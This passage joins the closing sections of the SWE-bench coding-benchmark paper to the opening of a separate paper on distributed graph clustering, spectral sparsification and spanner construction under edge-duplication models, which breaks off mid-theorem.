inputs are stylized for readability. In the gold and generated patch file, red-highlighted lines represent deletions and green-highlighted lines represent additions. one or a few skills, resulting in challenges that are typically too simple, pigeonhole the model into a reduced role, and do not provide models with the bandwidth to exercise their versatility or potentially demonstrate new abilities (Srivastava et al., 2023). Consequently, a model's performance on such task conglomerations may not yield actionable, deep insights regarding its capabilities and how to improve them (Schlangen, 2019; Martinez-Plumed et al., 2021; Bowman and Dahl, 2021). SWE-bench addresses these shortcomings, as our work demonstrates that it is significantly challenging, presents a wide range of possibilities for improving LMs to solve this task, and is easy to refresh over time with new task instances, each of which introduce novel, nuanced, and practical challenges. **Code Generation Benchmarks.** HumanEval (Chen et al., 2021) is the current standard in a long-standing pursuit of synthesizing code from natural language descriptions (Yu et al., 2018; Austin et al., 2021; Hendrycks et al., 2021; Li et al., 2022; Zan et al., 2023). In the past year, subsequent benchmarks have sought to augment HumanEval with extensions to different languages (Cassano et al., 2022; Athiwaratkun et al., 2023; Orlanski et al., 2023), variations in edit scope (Yu et al., 2023; Du et al., 2023), similar but novel code completion tasks (Muennighoff et al., 2023), and more testing (Liu et al., 2023). Simultaneously, separate works have sought to introduce new coding paradigms (Yin et al., 2022; Yang et al., 2023) or design library-specific problems (Lai et al., 2022; Zan et al., 2022). Instead of partitioning problems into silced datasets and curtailing them for simplicity's sake, SWE-bench's collection procedure transforms the source code with minimal post-processing, preserving a much broader set of challenges grounded in real-world software engineering beyond closed form completion, such as patch generation, reasoning over long contexts, navigating a codebase directory, and capturing dependency-based relationships across modules. **ML for Software Engineering.** To overcome traditional program analysis techniques that may not scale or incorporate natural language, one direction of current software engineering research has is to use neural networks, including LMs, to automate real-world software development processes (Maniatis et al., 2023; Zheng et al., 2023; Hou et al., 2023). Use cases include automating commit generation (Jung, 2021; Liu et al., 2023; Liu et al., 2023), PR review (Yang et al., 2016; Li et al., 2022; Tufano et al., 2021), bug localization Kim et al. (2019); Chakraborty et al. (2018), testing (Kang et al., 2023; Xia et al., 2023; Wang et al., 2023), and program repair (Monperrus, 2018; Gupta et al., 2017; Allamanis et al., 2017; Gazzola et al., 2019; Goues et al., 2019; Gao et al., 2022; Dinh et al., 2023; Motwani and Brun, 2023). Most relevant to SWE-bench are works that have sought to apply LMs towards automated program repair (Xia and Zhang, 2022; 2023; Fan et al., 2023), guiding code editing with commits (Chakraborty and Ray, 2021; Zhang et al., 2022; Fakhoury et al., 2023). However, none of the existing datasets (Just et al., 2014; Karampatsis and Sutton, 2019) present code context at the scale of SWE-bench. Moreover, SWE-bench isolates the changes at the function level, and can be easily extended to new programming languages and other software modalities. SWE-bench is compatible with such works, but provides a significantly more realistic and challenging arena to carry out future experiments towards augmenting LMs with software engineering tools and practices. ## 7 Discussion **Limitations and future directions.** SWE-bench task instances are all in Python; we hope to apply SWE-bench's task instance collection procedure to expand its coverage to more programming languages and domains. Second, our experiments aim to establish a baseline of the simplest and most straight-forward approaches for this task; we do not intend to constrain future methodologies to the same type of approach and encourage future work to investigate different methods. To this end, we are particularly excited about agent-based approaches for identifying relevant context from a codebase, larger scale models fine-tuned for patch generation, and augmenting LMs with program analysis and software engineering tools. Lastly, while this work evaluates models using execution-based code testing, relying solely on this method is insufficient to guarantee reliable performance of model generations, as we find automated code generations from LMs can frequently be less comprehensive, efficient, or readable compared to human-written solutions. **Conclusion.** The complexity of real-world software development processes extends far beyond just code completion. By drawing on the open-source collaborative pipeline, SWE-bench creates a faithful mirror of real world coding environments. This more realistic environment encourages creative solutions that can have immediate applicability in open-source software development. We hope that this benchmark and our other contributions can serve as valuable assets in the future development of LMs that are more practical, intelligent, and autonomous. Ethics Statement SWE-bench is collected entirely from public repositories with licenses that permit software usage that our contributions are in accordance with. Details of the licenses are included in Table 12. During the collection or evaluation processes, we do not collect information about GitHub users, and the SWE-bench task instances do not use GitHub data beyond what is offered via the public API and website. Our contributions do not involve any human subject participation; we do not perform crowdsourcing or recruit human task workers for any part of SWE-bench, including its collection and evaluation procedures along with the experiments. SWE-bench's filtering criteria for GitHub repositories based on popularity does not implicitly or explicitly rely on any discriminative or biased heuristics for repository selection. For the dataset release, we plan to open source the SWE-bench task instances, the collection and evaluation infrastructure, the experimental results, the training data used for fine-tuning SWE-Llama models, and the SWE-Llama model weights. Following best practice precedents, we will also put forth ample documentation to describe each component and its use, and we will also put in place convenient communication channels for soliciting feedback to improve SWE-bench. SWE-bench does not put forth any immediately harmful insights. We briefly discuss the potential impact of SWE-bench's usage in Section E. ## 9 Reproducibility Statement For our submission, we have uploaded the entirety of the source code as a zipped file that has been properly anonymized. We have organized the codebase such that separate directories correspond to different contributions within the main paper (i.e. dataset collection, evaluation, open source model inference, SWE-Llama training, etc.). The source code contains inline documentation that details purpose and usage of different parts of the codebase. In addition, we also include the full set of 2294 SWE-bench task instances that contains all the components discussed in the main paper. Beyond the documentation in the source code, we include thorough technical details for the collection pipeline and evaluation procedures in Section A.2 and Section A.4 that complements the original details in Section 2 of the main paper. These sections fully cover the logic presented in the code and can be helpful for understanding it. Moving forward, as discussed in the ethics statement, we plan to more formally release SWE-bench to the public as an open source repository with thorough details that describes the benchmark, outlines the code, and details its usage. A major component of SWE-bench is the collection framework, which will be part of the open sourced code. Because of its easily maintainable design, as discussed in the main paper, our hope and belief is that SWE-bench should be highly reproducible. ## 10 Acknowledgements We thank Danqi Chen, Tri Dao, Zexuan Zhong, Tianyu Gao, Will Merrill, Mengzhou Xia, Dan Friedman, Adithya Bhaskar, Austin Watkins, Aatmik Gupta, and Richard Zhu for their valuable feedback and advice.
2302.09652
Communication-Efficient Distributed Graph Clustering and Sparsification under Duplication Models
In this paper, we consider the problem of clustering graph nodes and sparsifying graph edges over distributed graphs, when graph edges with possibly edge duplicates are observed at physically remote sites. Although edge duplicates across different sites appear to be beneficial at the first glance, in fact they could make the clustering and sparsification more complicated since potentially their processing would need extra computations and communications. We propose the first communication-optimal algorithms for two well-established communication models namely the message passing and the blackboard models. Specifically, given a graph on $n$ nodes with edges observed at $s$ sites, our algorithms achieve communication costs $\tilde{O}(ns)$ and $\tilde{O}(n+s)$ ($\tilde{O}$ hides a polylogarithmic factor), which almost match their lower bounds, $\Omega(ns)$ and $\Omega(n+s)$, in the message passing and the blackboard models respectively. The communication costs are asymptotically the same as those under non-duplication models, under an assumption on edge distribution. Our algorithms can also guarantee clustering quality nearly as good as that of centralizing all edges and then applying any standard clustering algorithm. Moreover, we perform the first investigation of distributed constructions of graph spanners in the blackboard model. We provide almost matching communication lower and upper bounds for both multiplicative and additive spanners. For example, the communication lower bounds of constructing a $(2k-1)$-spanner in the blackboard with and without duplication models are $\Omega(s+n^{1+1/k}\log s)$ and $\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})$ respectively, which almost match the upper bound $\tilde{O}(s+n^{1+1/k})$ for both models.
Chun Jiang Zhu
2023-02-19T18:46:24Z
http://arxiv.org/abs/2302.09652v1
# Communication-Efficient Distributed Graph Clustering and Sparsification under Duplication Models + ###### Abstract In this paper, we consider the problem of clustering graph nodes and sparsifying graph edges over distributed graphs, when graph edges with possibly edge duplicates are observed at physically remote sites. Although edge duplicates across different sites appear to be beneficial at the first glance, in fact they could make the clustering and sparsification more complicated since potentially their processing would need extra computations and communications. We propose the first communication-optimal algorithms for two well-established communication models namely the message passing and the blackboard models. Specifically, given a graph on \(n\) nodes with edges observed at \(s\) sites, our algorithms achieve communication costs \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\) (\(\tilde{O}\) hides a polylogarithmic factor), which almost match their lower bounds, \(\Omega(ns)\) and \(\Omega(n+s)\), in the message passing and the blackboard models respectively. The communication costs are asymptotically the same as those under non-duplication models, under an assumption on edge distribution. Our algorithms can also guarantee clustering quality nearly as good as that of centralizing all edges and then applying any standard clustering algorithm. Moreover, we perform the first investigation of distributed constructions of graph spanners in the blackboard model. We provide almost matching communication lower and upper bounds for both multiplicative and additive spanners. For example, the communication lower bounds of constructing a \((2k-1)\)-spanner in the blackboard with and without duplication models are \(\Omega(s+n^{1+1/k}\log s)\) and \(\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})\) respectively, which almost match the upper bound \(\tilde{O}(s+n^{1+1/k})\) for both models. **Keywords:** Distributed Graph Clustering, Graph Sparsification, Spectral Sparsifiers, Graph Spanners ## 1 Introduction Graph clustering is one of the most fundamental tasks in machine learning. Given a graph consisting of a node set and an edge set, graph clustering asks to partition graph nodes into clusters such that nodes within the same cluster are "densely-connected" by graph edges, while nodes in different clusters are "loosely-connected". Graph clustering on modern large-scale graphs imposes high computational and storage requirements, which are too expensive to obtain from a single machine. In contrast, distributed computing clusters and server storage are a popular and cheap way to meet the requirements. Distributed graph clustering has received considerable research interests, _e.g._, [13, 14, 15]. Interestingly, these works show their close relationships with (distributed) graph sparsification. Graph sparsification is the task of approximating an arbitrary graph by a sparse graph that has a reduced number of edges while approximately preserving certain property. It is often useful in the design of efficient approximation algorithms, since most algorithms run faster on sparse graphs than the original graphs. Several notions of graph sparsification have been proposed. Spectral sparsifiers [13] well approximate the spectral property of the original graphs and can be used to approximately solve linear systems over graph Laplacian, and to approximate effective resistances, spectral clustering, and random walk properties [13, 14]. On the other hand, graph spanners are a type of graph sparsifiers that well approximate shortest-path distances in the original graph. A subgraph \(H\) of an undirected graph \(G\) is called a \(k\)-spanner of \(G\) if the distance between any pair of vertices in \(H\) is no larger than \(k\) times of that in \(G\), and \(k\) is called the _stretch_ factor. It is well known that for any \(n\)-vertex graph, there exists a spanner of stretch \(2k-1\) and size (the number of edges) \(O(n^{1+1/k})\)[15]. This is optimal if we believe the Erdos's girth conjecture [1]. Many research efforts were then devoted to _additive spanners_, where the distance between any vertex pair is no larger by an additive term \(\beta\) instead of a multiplicative factor. Here the spanner is called a \(+\beta\)-spanner. There have been different constructions of \(+2\)-, \(+4\)-, \(+6\)-spanners of size \(O(n^{3/2})\), \(O(n^{7/5})\), and \(O(n^{4/3})\), respectively [1, 2]. Spanners have found a wide range of applications in network routing, synchronizers and broadcasting, distance oracles, and preconditioning of linear systems [15, 2]. In an \(n\)-vertex distributed graph \(G(V,E)\), each of \(s\) sites, \(S_{i}\), holds a subset of edges \(E_{i}\subseteq E\) on a common vertex set \(V\) and their union is \(E=\cup_{i=1}^{s}E_{i}\). We consider two well-established models of communication, the _message passing_ model and _blackboard_ model, following the above work. In the former, there is a communication channel between every site and a distinguished coordinator. Each site can send a message to another site by first sending to the coordinator, who then forwards the message to the destination. In the latter, sites communicate with each other through a shared blackboard such as a broadcast channel. The models can be further considered in two settings: edge sets of different sites are disjoint (_non-duplication_ models) and they can have non-empty intersection (_duplication_ models). Here the major objective is to minimize the communication cost that is usually measured by the total number of bits communicated. A typical framework of distributed graph clustering is to employ graph sparsification tools to significantly reduce the size of edge sets of different sites while keeping structural properties. [17] proposed to compute spectral sparsifiers for the graphs at different sites and transmit them to the coordinator. Upon receiving all sparsifiers, the coordinator takes their union and applies a standard clustering algorithm, _e.g._, [11]. However, all the existing methods that follow this framework such as [17, 18] only work in non-duplication models. The assumption that edge sets of different sites are disjoint is crucial to get the _decomposability_ of spectral sparsifiers: the union of spectral sparsifiers of subgraphs at different sites is a spectral sparsifier of the distributed graph. Unfortunately, the decomposability does not work in duplication models. When edge sets of different sites have non-empty intersection, it is unclear how to process edge "duplicates" that are possible to have different edge weights after sparsification. See Figure 1 for a concrete example. To the best of our knowledge, none of the existing algorithms can perform distributed graph clustering in the more general duplication models with reasonable theoretical guarantees on both communication cost and clustering quality. Instead of restoring the decomposability and turning to the framework, our algorithms are built based on the construction of spectral sparsifiers by graph spanners [10]. The adaptation of the algorithm to the duplication models need new algorithmic procedures such as weighted graph spanners and uniform sampling. Although distributed constructions of graph spanners have been studied in message passing and CONGEST models [1, 2, 13], unfortunately they have not been systematically studied in the blackboard model. The blackboard model represents distributed systems with a broadcast channel. It can be viewed as a model for single-hop wireless networks and has received increasingly growing research [17, 2]. In the second part of this paper, we also investigate the problem of constructing graph spanners under the blackboard with both duplication and non-duplication models and obtain several almost matching communication lower and upper bounds. **Our Contributions.** We perform the first investigation of distributed graph clustering and spectral sparsification under duplication models. We propose communication-optimal (up to polylogarithmic factor) algorithms with communication cost \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\) in the message passing and blackboard with duplication models, respectively. Interestingly, the communication costs are asymptotically the same as the those in the non-duplication models under an assumption on edge distribution: the probability of an edge residing at each of the sites is a known value. This is practical when the popularity or degree of duplication of edges is obtainable. It is guaranteed that the quality of our clustering results is nearly as good as the simple method of centralizing all edge sets at different sites and then applying a standard clustering algorithm, _e.g._, [11]. Furthermore, we study distributed constructions of graph spanners in the blackboard models with and without edge duplication in order to improve our poor understanding on the communication complexity. Table 1 summarizes our main findings and Table 2 provides the communication complexity in the message passing model [2]. We confirm that the blackboard model is able to significantly reduce the commu nication complexity compared to the message passing model. Unlike the problem of distributed clustering and spectral sparsification, edge duplication potentially brings more communications for distributed spanner construction problem. See detailed discussions in Section 4. **Related Work.** There have been extensive research on graph clustering in the distributed setting, _e.g._, [13, 14, 15, 16]. [13] proposed a divide and conquer method for distributed graph clustering. [14] used spectral sparsifiers in graph clustering for two distributed communication models to reduce communication cost. [15] presented a computationally and communication efficient node degree based sampling scheme for distributed graph clustering. [16] studied distributed dynamic graph clustering based on the monotonicity property of graph sparsification. However, all these methods assume that there are no edge duplicates across different sites and do not work in the more general duplication setting. Graph spanners have been studied in the non-distributed model [16, 1] and a few distributed models [1, 17]. [18] studied distributed constructions of pair-wise spanners that approximate distances only for some pairs of vertices in the CONGEST model. [17] studied distributed construction of a serials of graph spanners in the message passing with and without duplication models. But, there exists no prior work considering such construction in the blackboard model, which has been a widely adopted communication model [1, 18, 19]. ## 2 Definitions and Notations A weighted undirected graph \(G(V,E,W)\) consists of a vertex set \(V\), an edge set \(E\) and a weight function \(W\) which assigns a weight \(W(e)\) to each edge \(e\in E\). \(W\) can be omitted from the presentation if it is clear from the context. Throughout the paper let \(n=|V|\) and \(m=|E|\) denote the number of vertices and the number of edges in \(G\) respectively, and \(s\) be the number of remote sites \(G\) is observed. Let \(w\) be the maximum edge weight in \(G\), _i.e._, \(w=\max_{e}W(e)\). We denote by \(d_{G}(u,v)\) the _shortest-path distance_ from \(u\) to \(v\) in \(G\). A \(\alpha\)-spanner and \(+\beta\)-spanner for \(G\) are a subgraph \(H(V,E^{\prime}\subseteq E)\) of \(G\) such that for every \(u,v\in V\), \(d_{H}(u,v)\leq\alpha*d_{G}(u,v)\) and \(d_{H}(u,v)\leq d_{G}(u,v)+\beta\), respectively. \begin{table} \begin{tabular}{|c|c|c|c|} \hline \multirow{2}{*}{Problem} & \multirow{2}{*}{Upper Bound} & \multicolumn{2}{c|}{Lower Bound} \\ \cline{3-4} & & Non-duplication & Duplication \\ \hline \((2k-1)\)-spanner & \(O(s+n^{1+1/k})\) & \(\Omega(s+n^{1+1/k}\max\{1,\frac{\log s}{\gamma(1+1/k)/2}\})\) & \(\Omega(s+n^{1+1/k}\log s)\) \\ \hline \(+2\) or \(3\)-spanner & \(O(s+n\sqrt{n+s})\) & \(\Omega(s+n^{3/2})\) & \(\Omega(s+n^{3/2}\log s)\) \\ \hline \(+k\)-spanner & \(O(s+n\sqrt{n+s})\) & \(\Omega(s+n^{4/3-\alpha(1)})\) & \(\Omega(s+n^{4/3-\alpha(1)}\log s)\) \\ \hline \end{tabular} \end{table} Table 1: Communication complexity of computing graph spanners in the blackboard model, where \(n\) is the number of vertices in the input graph and \(s\) is the number of sites. ## 3 Distributed Graph Clustering In this section, we state our distributed graph clustering algorithms in the message passing and blackboard with duplication models. We first discuss challenges introduced by edge duplicates presenting at different sites and then show how we overcome the challenges. **Definitions.** Define the graph _Laplacian_ of a graph \(G\) as \(L=D-A\) where \(A\) is the adjacency matrix of \(G\) and \(D\) is the degree matrix, _i.e._, a diagonal matrix with the \(i\)-th diagonal entry equal to the sum over the \(i\)-th row of \(A\). A \((1+\epsilon)\)-_spectral sparsifier_ of \(G\), denoted as \((1+\epsilon)\)-\(SS(G)\), is a (possibly re-weighted) subgraph \(H\) of \(G\) such that for every \(x\in R^{n}\), the inequality \[(1-\epsilon)x^{T}L_{G}x\leq x^{T}L_{H}x\leq(1+\epsilon)x^{T}L_{G}x\] holds. Each edge \(e\) in \(G\) has _resistance_\(R(e)=1/W(e)\), and the _effective resistance_ between any two vertices \(u\) and \(v\) in \(G\), denoted as \(R_{G}(u,v)\), is defined as the potential difference that has to be applied between them in order to drive one unit of current through the network \(G\). **Challenges.** Distributed graph clustering algorithms designed for non-duplication models cannot be easily extended to duplication models. We explain the fact using [10] in the message passing model as an example: every site \(S_{i}\) constructs a spectral sparsifier of its local graph \(G_{i}(V,E_{i})\) as a synopsis \(H_{i}\) and then transmits \(H_{i}\), instead of \(G_{i}\), to the coordinator. Upon receiving \(H_{i}\) from all sites, the coordinator takes their union, \(H=\cup_{i=1}^{s}H_{i}\) as the constructed structure. The algorithm is based on the decomposability property of spectral sparsifiers. To see this, for every \(i\in[1,s]\), by definition of spectral sparsifiers, we have for every vector \(x\in R^{n}\), \((1-\epsilon)x^{T}L_{G_{i}}x\leq x^{T}L_{H_{i}}x\leq(1+\epsilon)x^{T}L_{G_{i}}x.\) Summing all inequalities for \(i\in[1,s]\), we get that \[(1-\epsilon)\sum_{i\in[1,s]}x^{T}L_{G_{i}}x\leq\sum_{i\in[1,s]}x^{T}L_{H_{i}}x \leq(1+\epsilon)\sum_{i\in[1,s]}x^{T}L_{G_{i}}x.\] In the non-duplication model, it is easy to check that \(\sum_{i=1}^{s}L_{G_{i}}=L_{G}\) by the definition of Laplacian matrix. Then the above inequality is equivalent to \[(1-\epsilon)x^{T}L_{G}x\leq x^{T}L_{H}x\leq(1+\epsilon)x^{T}L_{G}x, \tag{1}\] which concludes that \(H\) is a \((1+\epsilon)\)-spectral sparsifier of \(G\). Under the duplication model, however, it is clear that \(\sum_{i=1}^{s}L_{G_{i}}\neq L_{G}\) and thus Inequality (1) does not hold any longer. In other words, the structure \(H\) constructed using the same principle is not a spectral sparsifier of \(G\). See Figure 1 for an illustrating example. **Proposed Method.** Restoring the decomposability of spectral sparsifiers in the duplication models appears to be quite challenging. We avoid it by asking every site cooperates to construct a spectral sparsifier of the distributed graph in the coordinator, who can then get clustering results by any standard clustering algorithm. A standard method of computing spectral sparsifiers [10] is to sample each edge in the input graph with a probability proportional to its effective resistance and then include the sampled edges (after appropriate weight rescaling) into the sparsifier. But, when there are duplicated edges across different sites, an edge \((u,v)\) may get sampled more than once at different sites, thereby resulting in multiple edges of possibly different weights between \(u\) and \(v\), _e.g._, edges \(e_{1}^{1}\) and \(e_{1}^{2}\) in Figure 1. It is unclear how to process these edges to guarantee the resulting structure is always a spectral sparsifier. As in Figure 1, simply taking union by summing edge weights does not produce a valid spectral sparsifier. Instead of using the classic sampling method, we propose to make use of the fact that spectral sparsifiers can be constructed by graph spanners [10] to compute spectral sparsifiers in the coordinator. The \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline \multirow{2}{*}{Problem} & \multicolumn{2}{c|}{Upper Bound} & \multicolumn{2}{c|}{Lower Bound} \\ \cline{2-5} & Non-duplication & Duplication & Non-duplication & Duplication \\ \hline \((2k-1)\)-spanner & \(O(ks^{1-2k}n^{1+1/k}+snk)\) & \(O(sn^{1+1/k})\) & \(\Omega(ks^{1/2-1/(2k)}n^{1+1/k}+sn)\) & \(\Omega(sn^{1+1/k})\) \\ \hline \(+2\) or \(3\)-spanner & \(O(\sqrt{s}n^{3/2}+sn)\) & \(O(sn^{3/2})\) & \(\Omega(\sqrt{s}n^{3/2}+sn)\) & \(\Omega(sn^{3/2})\) \\ \hline \(+k\)-spanner & \(O(\sqrt{s/}kn^{3/2}+snk)\) & \(O(sn^{3/2})\) & \(\Omega(n^{4/3-o(1)}+sn)\) & \(\Omega(sn^{4/3-o(1)})\) \\ \hline \end{tabular} \end{table} Table 2: Communication complexity of computing graph spanners in the message passing model [12]. connection between spectral sparsifiers and graph spanners allows us to convert spectral sparsification to graph spanner construction and uniform sampling under duplication models. In the followings, we first introduce the algorithm of [10] and then discuss how to adapt the algorithm in the message-passing and blackboard under duplication models. **The algorithm of [10].** Given a weighted graph, their algorithm first determines a set of edges that has small effective resistance through graph spanners. Specifically, it constructs a \(t\)-bundle \(\log n\)-spanner \(J=J_{1}\cup J_{2}\cup\cdots\cup J_{t}\), that is, a sequence of \(\log n\)-spanners \(J_{i}\) for each graph \(G_{i}=G-\cup_{j=1}^{i-1}J_{j}\) with \(1\leq i\leq t=O(\epsilon^{-2}\log n)\). Intuitively, it peels off a spanner \(J_{i}\) from the graph \(G_{i}\) to get \(G_{i+1}\) before computing the next spanner \(J_{i+1}\), _i.e._, \(J_{1}\) is a spanner of \(G\), \(J_{2}\) is a spanner of \(G-J_{1}\), _etc_. The \(t\)-bundle spanner guarantees that each _non-spanner_ edge (edge not in the spanner) has \(t\) edge-disjoint paths between its endpoints in the spanner (and thus in \(G\)), serving as a certificate for its small effective resistance. The algorithm then uniformly samples each non-spanner edge with a fixed constant probability, _e.g._, \(0.25\) and scales the weight of each sampled edge proportionally, _e.g._, by \(4\) to preserve the edge's expectation. By the matrix concentration bounds, it is guaranteed that the spanner together with the sampled non-spanner edges are a moderately sparse spectral sparsifier, in which the number of edges has been reduced by a constant factor. The desirable spectral sparsifier can be obtained by repeating the process until we get a sufficient sparsity, which happens after logarithmic iterations. **Weighted Graph Spanners.** An important building block in [10] is the construction of graph spanners of stretch factor \(\log n\), which can be used to construct the \(t\)-bundle \(\log n\)-spanner. Unfortunately, there is no algorithm that can generate such a spanner under the duplication models. [11] developed an algorithm for constructing \((2k-1)\)-spanners in unweighted graphs under the message passing with duplication model through the implementation of the greedy algorithm [1]. But the algorithm does not work in weighted graphs, where the greedy algorithm would need to process the edges in nondecreasing order of their weights. This seems to be a notable obstacle in both the message passing model and the blackboard model. In this paper, we first propose an algorithm for constructing \((4k-2)\)-spanners in weighted graphs under the message passing with duplication model. We are able to overcome the challenge in weighted graphs at the expense of a larger stretch factor \(4k-2\). However, this is sufficient for the construction of \(\log n\)-spanners in weighted graphs by setting the parameter \(k=O(\log n)\). Specifically, we divide the range of edge weights \([1,w]\) into logarithmic intervals, where the maximum edge weight \(w\) is assumed to be polynomial in \(n\)1. Then we process edges in each logarithmic scale \([2^{i-1},2^{i})\), where \(1\leq i\leq log_{2}(hw)\), as follows. Each site \(S_{j}\) in order decides which of its edge \(e\in E_{j}\) of weight in \([2^{i-1},2^{i})\) to include into the current spanner \(H\). If including the edge \(e\) results in a cycle of at most \(2k-1\) edges, then the shortest distance between \(e\)'s endpoints in the current spanner is guaranteed to be less than \((4k-2)W(e)\) (see our proof below). Thus the edge can be discarded. Otherwise, we update the current spanner \(H\) by including \(e\). After completing processing of \(E_{j}\), \(S_{j}\) forwards the possibly updated spanner \(H\) to the next site. The algorithm is summarized in Algorithm (Alg. 1). Footnote 1: This is a common and practical assumption for modern graphs. **Theorem 1**.: _Given a weighted graph and a parameter \(k>1\), Alg. 1 constructs a \((4k-2)\)-spanner using communication cost \(\tilde{O}(sn^{1+1/k})\) in the message passing with or without duplication model._ Proof.: We first prove that the stretch factor is \(4k-2\). For each edge \((u,v)\in E\), if \((u,v)\not\in H\), it must be that including the edge \((u,v)\) would close a cycle of length \(\leq 2k\). That is, there exists a path \(P\) of \(\leq 2k-1\) edges between \(u\) and \(v\) in \(H\). Since we process edges in logarithmic scale, the edge weights in \(P\) cannot be larger than \(2W(u,v)\). Thus the path length of \(P\) is at most \((4k-2)W(e)\). Therefore, the output \(H\) is a \((4k-2)\)-spanner. We then prove the communication cost. By construction, the output graph \(H\) has girth (the minimum number of edges in a cycle contained in the graph) larger than \(2k\). It is well known that a graph with girth larger than \(2k\) have \(O(n^{1+1/k})\) edges [1]. Then \(H\) always has \(O(n^{1+1/k})\) edges throughout the processing of each logarithmic interval. Thus the total communication cost is \(\tilde{O}(sn^{1+1/k})\). The algorithm works for both with and without duplication settings, which do not affect the communication complexity. Alg. 1 can be extended to the blackboard model with the following modification: In Line 10, if site \(S_{j}\) does change \(H\) by adding some edge(s), it transmits the updated spanner \(H\) to the blackboard, instead of the next site; otherwise, it sends a special marker of one bit to the blackboard to indicate that it has completed the processing. The results are summarized in Theorem 2. In Section 4, we will show that the communication cost can be reduced to \(2k-1\) in unweighted graphs. **Theorem 2**.: _The communication complexity of constructing a \((4k-2)\)-spanner in weighted graphs under the blackboard with or without duplication model is \(\tilde{O}(s+n^{1+1/k})\). In unweighted graph, the stretch factor can be reduced to \(2k-1\)._ **Constructing \(t\)-bundle \(\log n\)-spanner.** Recall that a \(t\)-bundle \(\log n\)-spanner \(J=J_{1}\cup J_{2}\cup\cdots\cup J_{t}\), where \(J_{i}\) is a \(\log n\)-spanner for graph \(G_{i}=G-\cup_{j=1}^{i-1}J_{j}\), for \(1\leq i\leq t\). When \(i=1\), \(G_{1}=G\) is a distributed graph with each site \(S_{j}\) having edge set \(E_{j}\). We can use Alg. 1 with \(k=(2+\log n)/4\) to compute a \(\log n\)-spanner \(J_{1}\) of \(G_{1}\). For \(2\leq i\leq t\), \(G_{j}=G_{j-1}-J_{j}\) is again a distributed graph: each site \(S_{j}\) knows which of its edges \(E_{j}\) was included in \(J_{1},J_{2},\cdots,J_{i-1}\) and those edges are excluded from its edge set \(E_{j}-J_{1}-J_{2}-\cdots-J_{i-1}\). Therefore, the construction of a \(t\)-bundle \(\log n\)-spanner invokes Alg. 1 for \(t\) times. Because of \(t=O(\epsilon^{-2}\log n)\) and Theorems 1 and 2, the total communication costs in the message passing and blackboard with duplication models are \(\tilde{O}(sn)\) and \(\tilde{O}(s+n)\), respectively. **Uniform Sampling.** After the spanner construction, the algorithm of [14] then uniformly samples each non-spanner edge with a fixed probability, _e.g._, 0.25 and scales the weight of each sampled edge proportionally, _e.g._, by 4. We observe that sampling with a fixed probability is much more friendly to edge duplicates as compared to sampling with a varied probability used in traditional methods such as [1]. For example in Figure 1, if the duplicates \(e_{1}^{1}\) and \(e_{1}^{2}\) of \(e_{1}\) are both sampled (under a fixed probability 0.25), they still have the same weight \(4W(e_{1})\) and are edge duplicates again in the next iteration. If one of them, say \(e_{1}^{1}\), is not sampled, it is removed from the (local) graph at site \(S_{1}\) and will not formulate duplicates with \(e_{1}^{2}\) at site \(S_{2}\). In contrast, non-uniform sampling could result in sampled edges of rather different weights, which may not be even considered as duplicates. However, uniform sampling under duplication models is still very challenging: if a fixed probability is used for every edge, an edge with \(d\) duplicates across different sites is processed/sampled for \(d\) times, each at one of the \(d\) sites, and thus has a higher probability being sampled than another edge with smaller duplicates. This results in a non-uniform sampling. To achieve the uniform sampling, we suppose that the probability of an edge \(e\) residing at each of the sites is a known value \(r_{e}\). If we set the probability of random sampling at each site as \(p_{e}\), then the probability that the edge is not sampled at each site is \(1-p_{e}*r_{e}\). It can be derived that the probability that \(e\) is sampled by _at least_ one site is \(p=1-(1-p_{e}*r_{e})^{s}\). Since the values of \(r_{e}\) and \(s\) are known, we can tune the value of \(p_{e}\) to get the expected sampling probability \(p=0.25\). At some site, if \(e\) is sampled and added to \(H\), we update its presenting probability as \(p_{e}*r_{e}\), which will be used in the next iteration. Otherwise (if \(e\) is not sampled), it is discarded and will not participate in the next iteration. See the details in Algorithms 2 and 3. ``` 0:\(G(V,E),\epsilon\in(0,1)\), and probability \(r_{e}\) for each edge \(e\) 0:\(H\) 1:\(H\) with updated \(r_{e}^{\prime}\) for each edge \(e\in H\) 1:\(G_{1}\gets G\); \(J\leftarrow\emptyset\) 2:for\(i\in[1,24\log^{2}n/\epsilon^{2}]\)do 3:\(J_{i}\gets Spanner(G_{i},(2+\log n)/4)\) 4:\(G_{i+1}\gets G_{i}-J_{i}\) 5:endfor 6:\(H\gets J\); \(r_{e}^{\prime}\gets r_{e}\) 7:for each site \(S_{i}\)do 8:for each edge \(e\in E_{i}-J\)do 9: Sample the edge \(e\) with probability \(p_{e}\) such that \(1-(1-p_{e}*r_{e})^{s}=0.25\); if \(e\) is sampled, adds \(e\) to \(H\) with a new weight \(4W(e)\) and set \(r_{e}^{\prime}\) to \(p_{e}*r_{e}\) 10:endfor 11:if it is the last iteration of the for-loop in Line 2 of Alg. 3 then 12: Transmit the sampled edges to the coordinator 13:endif 14:endfor 15:return\(H\); ``` **Algorithm 2**_Light-SS_ under duplication models The main algorithm, Alg. 3 computes \((1+\epsilon)\)-spectral sparsifier in \(\lceil\log\rho\rceil\) iterations of _Light-SS_, where \(\rho\) is a sparsification parameter. The communication cost of _Light-SS_ is composed of the cost for the bundle spanner construction and the cost for non-spanner edge sampling. If the sampled edges are transmitted to the coordinator, the communication cost \(\tilde{O}(m)\) could be prohibitively large. To see this, the number of edges in the output \(G_{i}\) after each iteration is only reduced by a constant factor because the uniform sampling removes \(3/4\) of the non-spanner edges in expectation. To improve the communication cost, we keep sampled edges in each iteration at local sites and do not transmit them to the coordinator except for the very last iteration. Then similar to the input graph \(G\), the output \(G_{i}\) for each iteration \(i\in[1,\lceil\log\rho\rceil-1]\) are also a distributed graph with possible edge duplication. Edge duplicates come from two sources: either the edge is included into the bundle spanner, or the edge is sampled by more than one site. In this way, the communication cost of _Light-SS_ (except for the last iteration) contains only the cost of constructing the bundle spanner. In the last iteration, the number of sampled edges must be small \(\tilde{O}(n)\), which is also the communication cost of their transmission. Therefore, the communication costs of Alg. 3 in the message passing and blackboard under duplication models are \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\), respectively. Putting all together, our results for distributed spectral sparsification under duplication models are summarized in Theorem 3 with its formal proof deferred to Appendix A. **Theorem 3** (Spectral Sparsification under Duplication Models).: _For a distributed graph \(G\) and parameters 